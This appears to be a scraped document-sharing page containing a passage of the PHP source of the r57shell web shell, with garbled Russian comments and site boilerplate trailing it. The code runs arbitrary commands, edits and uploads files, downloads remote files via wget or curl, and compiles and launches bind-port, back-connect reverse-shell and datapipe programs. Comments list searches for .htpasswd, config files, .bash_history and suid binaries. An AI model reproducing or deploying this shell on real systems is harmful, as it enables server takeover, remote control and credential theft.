lyygkcm91dcwgzmlszw5vkcrjacksidepkskgew0kbxkgjhjlc3vsdca9ihn5c3jlywqojgnolcakdgj1z
mzlciwgmtaynck7dqppziaoiwrlzmluzw
qojhjlc3vsdckpihsncnbyaw50ifnurevsuiaijcfcbii7dqplegl0ida7dqp9dqppziaojhjlc3vsdca9
psawksb7igv4axqgmdsgfq0kfq0kawygk
cr0acagjiygich2zwmojgvvdxqsigzpbgvubygkdggplcaxksagfhwgdmvjkcryb3v0lcbmawxlbm8ojhr
okswgmskpksb7dqptesakcmvzdwx0id0g
c3lzcmvhzcgkdggsicrjynvmzmvylcaxmdi0ktsncmlmicghzgvmaw5lzcgkcmvzdwx0kskgeybwcmludc
btverfuligiiqhxg4ioyblegl0ida7ih0
ncmlmicgkcmvzdwx0id09idapihtlegl0ida7fq0kfq0kawygkcrmacagjiygicr0ynvmzmvyksb7khbya
w50icrmacakdgj1zmzlcik7fq0kd2hpbg
ugkg15icrszw4gpsbszw5ndggojhridwzmzxipksb7dqptesakcmvzid0gc3lzd3jpdguojhrolcakdgj1
zmzlciwgjgxlbik7dqppziaojhjlcya+i
dapihskdgj1zmzlcia9ihn1ynn0cigkdgj1zmzlciwgjhjlcyk7fsancmvsc2uge3byaw50ifnurevsuia
ijcfcbii7fq0kfq0kd2hpbgugkg15icrs
zw4gpsbszw5ndggojgnidwzmzxipksb7dqptesakcmvzid0gc3lzd3jpdguojgnolcaky2j1zmzlciwgjg
xlbik7dqppziaojhjlcya+idapihsky2j
1zmzlcia9ihn1ynn0cigky2j1zmzlciwgjhjlcyk7fsancmvsc2uge3byaw50ifnurevsuiaijcfcbii7f
q0kfx19dqo=";
/* --- end datapipe.pl
----------------------------------------------------------------------------------
------- */
/*** end base64
----------------------------------------------------------------------------------
-------------- */
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~//
/* logo + info */
echo $head;
echo '
'.ws(1).' !'.ws(2).'r57shell '.$version.' '; echo ws(2); echo "".date ("d-m-y
h:i:s").""; echo ws(2).$lb." phpinfo ".$rb; echo ws(2).$lb." php.ini ".$rb; echo
ws(2).$lb." tmp ".$rb."
"; echo ws(2); echo (($safe_mode)?("safe_mode: on"):("safe_mode: off")); echo
ws(2); echo "php version: ".phpversion().""; $curl_on =
@function_exists('curl_version'); echo ws(2); echo "curl: ".(($curl_on)?("on
(".@curl_version().")"):("off")); echo ws(2); echo "mysql: "; $mysql_on =
@function_exists('mysql_connect'); if($mysql_on) { $client_api =
function_exists('mysql_get_client_info') ? mysql_get_client_info() : ""; echo "on
($client_api)"; } else { echo "off"; } echo "
".ws(2); echo "disable functions : "; $df = ini_get('disable_functions');
if(empty($df)) echo "none"; else echo "$df"; echo '
';
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~// /* display information */ echo ""; if(!$windows){ echo 'uname -a
:'.ws(1).'
sysctl :'.ws(1).'
$ostype :'.ws(1).'
server :'.ws(1).'
id :'.ws(1).'
pwd :'.ws(1).'
'; echo " "; echo ""; echo((!empty($uname[1]))?(ws(3).substr($uname[1],0,120)."
"):(ws(3).substr(php_uname(),0,120)."
")); if(!$safe_mode){ $bsd1 = `/sbin/sysctl -n kern.ostype`; $bsd2 = `/sbin/sysctl
-n kern.osrelease`; $lin1 = `/sbin/sysctl -n kernel.ostype`; $lin2 = `/sbin/sysctl
-n kernel.osrelease`; } if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1
$bsd2"; } else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; } else
{ $sysctl = "-"; } echo ws(3).$sysctl."
"; echo ws(3).exec('echo $ostype')."
"; echo ws(3).substr($server_software,0,120)."
"; exec("id",$id); echo((!empty($id[1]))?(ws(3).$id[1]."
"):(ws(3)."user=".get_current_user()." uid=".getmyuid()." gid=".getmygid()."
")); echo ws(3).$dir; echo ""; } else { echo 'os :'.ws(1).'
server :'.ws(1).'
user :'.ws(1).'
pwd :'.ws(1).'
'; echo " "; echo ""; echo ws(3).substr(php_uname(),0,120)."
"; echo ws(3).substr($server_software,0,120)."
"; echo ws(3).get_current_user()."
"; echo ws(3).$dir."
"; echo ""; } echo ""; echo "
";
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~//
/* edit file */
if($_post['cmd']=="edit_file")
{
if(!$file=@fopen($_post['e_name'],"r+")) { $only_read = 1; fclose($file); }
if(!$file=@fopen($_post['e_name'],"r")) { echo re($_post['e_name']);
$_post['cmd']=""; }
else {
echo $table_up3;
echo "";
echo "
"; echo ws(3)."".$_post['e_name'].""; echo "
"; echo ""; echo ""; echo ""; echo (($only_read)?("
".$lang[$language._text44]):("
")); echo "

"; echo ""; echo "
";
echo "";
exit();
}
}
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~//
/* save file */
if($_post['cmd']=="save_file")
{
if(!$file=@fopen($_post['e_name'],"w")) { echo we($_post['e_name']); }
else {
fwrite($file,$_post['e_text']);
fclose($file);
$_post['cmd']="";
echo "
".$lang[$language._text45]."
";
}
}
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~//
/* port bind c */
if (!empty($_post['port'])&&!empty($_post['bind_pass'])&&($_post['use']=="c"))
{
cf("/tmp/bd.c",$port_bind_bd_c);
exec("gcc -o /tmp/bd /tmp/bd.c",$blah);
unlink("/tmp/bd.c");
exec("/tmp/bd ".$_post['port']." ".$_post['bind_pass']." &",$blah);
$_post['cmd']="ps -aux | grep bd";
}
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~//
/* port bind perl */
if (!empty($_post['port'])&&!empty($_post['bind_pass'])&&($_post['use']=="perl"))
{
cf("/tmp/bdpl",$port_bind_bd_pl);
$p2=which("perl");
if(empty($p2)) $p2="perl";
exec($p2." /tmp/bdpl ".$_post['port']." &",$blah);
$_post['cmd']="ps -aux | grep bdpl";
}
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~//
/* back connect perl */
if (!empty($_post['ip']) && !empty($_post['port']) && ($_post['use']=="perl"))
{
cf("/tmp/back",$back_connect);
$p2=which("perl");
exec($p2." /tmp/back ".$_post['ip']." ".$_post['port']." &",$blah);
$_post['cmd']="echo \"now script try connect to ".$_post['ip']." port
".$_post['port']." ...\"";
}
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~//
/* back connect c */
if (!empty($_post['ip']) && !empty($_post['port']) && ($_post['use']=="c"))
{
cf("/tmp/back.c",$back_connect_c);
exec("gcc -o /tmp/backc /tmp/back.c",$blah);
unlink("/tmp/back.c");
exec("/tmp/backc ".$_post['ip']." ".$_post['port']." &",$blah);
$_post['cmd']="echo \"now script try connect to ".$_post['ip']." port
".$_post['port']." ...\"";
}
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~//
/* datapipe perl */
if (!empty($_post['local_port']) && !empty($_post['remote_host']) && !
empty($_post['remote_port']) && ($_post['use']=="perl"))
{
cf("/tmp/dp",$datapipe_pl);
$p2=which("perl");
exec($p2." /tmp/dp ".$_post['local_port']." ".$_post['remote_host']."
".$_post['remote_port']." &",$blah);
$_post['cmd']="ps -aux | grep dp";
}
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~//
/* datapipe c */
if (!empty($_post['local_port']) && !empty($_post['remote_host']) && !
empty($_post['remote_port']) && ($_post['use']=="c"))
{
cf("/tmp/dpc.c",$datapipe_c);
exec("gcc -o /tmp/dpc /tmp/dpc.c",$blah);
unlink("/tmp/dpc.c");
exec("/tmp/dpc ".$_post['local_port']." ".$_post['remote_port']."
".$_post['remote_host']." &".$blah);
$_post['cmd']="ps -aux | grep dpc";
}
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~//
/* alias execute */
if (!empty($_post['alias']))
{
foreach ($aliases as $alias_name=>$alias_cmd) {
if ($_post['alias'] == $alias_name)
{$_post['cmd']=$alias_cmd;}
}
}
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~//
/* file upload */
if (!empty($http_post_files["userfile"][name]))
{
if(isset($_post['nf1']) && !empty($_post['new_name'])) { $nfn =
$_post['new_name']; }
else { $nfn = $http_post_files["userfile"][name]; }
copy($http_post_files["userfile"][tmp_name],
$_post['dir']."/".$nfn)
or print("
error uploading file ".$http_post_files["userfile"][name]."
");
}
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~//
/* file upload from remote host */
if (!empty($_post['with']) && !empty($_post['rem_file']) && !
empty($_post['loc_file']))
{
switch($_post['with'])
{
case wget:
$p2=which("wget");
if(empty($p2)) $p2="wget";
$_post['cmd'] = $p2." ".$_post['rem_file']." -o ".$_post['loc_file']."";
break;
case fetch:
$p2=which("fetch");
if(empty($p2)) $p2="fetch";
$_post['cmd']= $p2." -p ".$_post['rem_file']." -o ".$_post['loc_file']."";
break;
case lynx:
$p2=which("lynx");
if(empty($p2)) $p2="lynx";
$_post['cmd']= $p2." -source ".$_post['rem_file']." > ".$_post['loc_file']."";
break;
case curl:
$p2=which("curl");
if(empty($p2)) $p2="curl";
$_post['cmd']= $p2." ".$_post['rem_file']." -o ".$_post['loc_file']."";
break;
}
}
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~//
/* command execute */
echo $table_up3;
if (empty($_post['cmd'])&&!$safe_mode) { $_post['cmd']=($windows)?("dir"):("ls
-lia"); }
else if(empty($_post['cmd'])&&$safe_mode){ $_post['cmd']="safe_dir"; }
echo "".$lang[$language._text1].": ".$_post['cmd']."";
echo "";
echo "
";
echo "";
echo "";
//////// start table
echo "";
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~//
/* command execute form */
if(!$safe_mode){
echo "";
echo $table_up1; echo $lang[$language._text2]; echo $table_up2;
echo "";
echo "".ws(1).$lang[$language._text3].$arrow.ws(4)."";
echo "".ws(2)."
";
echo "";
echo ws(1)."";
echo "";
echo $table_end1;
echo "";
}
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~//
/* safe_mode form */
if($safe_mode){
echo "";
echo "";
// dir
echo "";
echo "";
echo ws(1)."";
// file
echo "";
echo "";
echo "";
echo "";
echo ws(1)."";
echo $table_end1;
echo "";
}
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~//
/* edit_file form */
echo "";
// dir
echo "";
echo "".$lang[$language._text43].$arrow.ws(4)."";
echo "";
echo "";
echo "";
echo ws(1)."";
echo "";
echo $table_end1;
echo "";
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~//
/* aliases form */
if(!$safe_mode){
echo "";
echo "";
echo $table_end1;
echo "
";
}
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~//
/* php eval form */
echo "";
echo "";
echo "
"; echo ""; echo ""; echo "
".ws(1).""; echo ""; echo $table_end1; echo "
";
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~//
/* php safe_mode break test 1 form */
if($safe_mode&&$curl_on)
{
echo "";
echo "";
echo "";
echo "";
echo "";
echo ws(1)."";
echo "";
echo $table_end1;
echo "";
}
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~//
if($safe_mode)
{
echo "";
echo "";
echo "";
echo "";
echo "";
echo ws(1)."";
echo "";
echo $table_end1;
echo "";
}
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~//
if($safe_mode&&$mysql_on)
{
echo "";
echo "";
echo "";
echo "";
echo "";
echo "
".ws(9).$lang[$language._text30].$arrow.ws(4)."";
echo "";
echo "";
echo "";
echo ws(1)."";
echo "";
echo $table_end1;
echo "";
}
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~//
/* file upload form */
echo "";
echo "";
echo " ";
echo "
echo "".ws(1);
echo "";
echo "";
echo "";
echo $table_end1;
echo "";
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~//
/* file upload from remote host form */
if(!$safe_mode&&!$windows){
echo "";
echo "";
echo $table_end1;
echo "";
echo "";
echo "";
echo ws(1)."";
echo "";
}
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~//
/* mysql dump form */
if($mysql_on)
{
echo "";
echo "";
echo "";
echo "";
echo "";
echo "";
echo "";
echo "";
echo "
echo "".ws(1);
echo ws(4)."";
echo "";
echo $table_end1;
echo "";
}
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~//
/* port bind form */
echo "";
echo "";
echo $table_end1;
echo "";
echo "
";
echo "".ws(2)."
";
echo "".ws(1);
echo "";
echo "";
echo "";
}
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~//
/* back connect form */
echo "";
echo "";
echo $table_end1;
echo "";
echo "".ws(1);
echo "".ws(1);
echo " ";
echo "";
echo ws(6)."";
echo "";
}
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~//
/* datapipe */
echo "
";
echo "";
echo $table_end1;
echo "";
echo "".ws(1);
echo " ";
echo " ";
echo "";
echo ws(6)."";
echo "";
}
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~//
/// end table
echo "";
echo "".ws(1);
echo "".ws(1);
echo "".ws(1);
echo " ";
echo ws(2)."";
echo "";
echo "";
/* (c) */
echo $table_up3;
echo "
o---[ r57shell - http-shell by rush security team | http://rst.void.ru | version
".$version." ]---o
";
echo "";
/* -------------------------[ eof ]------------------------- */
?>

Shell Rara

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Shell Rara

Uploaded by

Copyright:

Available Formats

\___|_ /

/* ~~~ ????????? ~~~ */

/* $http_post_vars --> $_post */

/* ????? ?? ??????? ???? ?????? ? suid ????? */

/* ????? ? ??????? ?????????? ???? ?????? ? suid ????? */

/* ????? ?? ??????? ???? ?????? ? sgid ????? */

/* ????? ? ??????? ?????????? ???? ?????? ? sgid ????? */

/* ????? ?? ??????? ?????? config.inc.php */

/* ????? ?? ??????? ?????? config* */

/* ????? ? ??????? ?????????? ?????? config* */

/* ????? ?? ??????? ???? ?????????? ? ?????? ????????? ?? ?????? ??? ???? */

/* ????? ? ??????? ?????????? ???? ?????????? ? ?????? ????????? ?? ?????? ???

/* ????? ?? ??????? ?????? service.pwd ... frontpage =))) */

/* ????? ? ??????? ?????????? ?????? service.pwd */

/* ????? ?? ??????? ?????? .htpasswd */

/* ????? ? ??????? ?????????? ?????? .htpasswd */

/* ????? ???? ?????? .bash_history */

/* ????? ? ??????? ?????????? ?????? .bash_history */

/* ????? ???? ?????? .fetchmailrc */

/* ????? ? ??????? ?????????? ?????? .fetchmailrc */

/* ????? ?????? ????????? ?????? ?? ???????? ??????? ext2fs */

/* ???????? ???????? ?????? */

/* get server info */

")); echo "

/* -------------------------[ eof ]------------------------- */

You might also like

/* ~ ????????? ~ */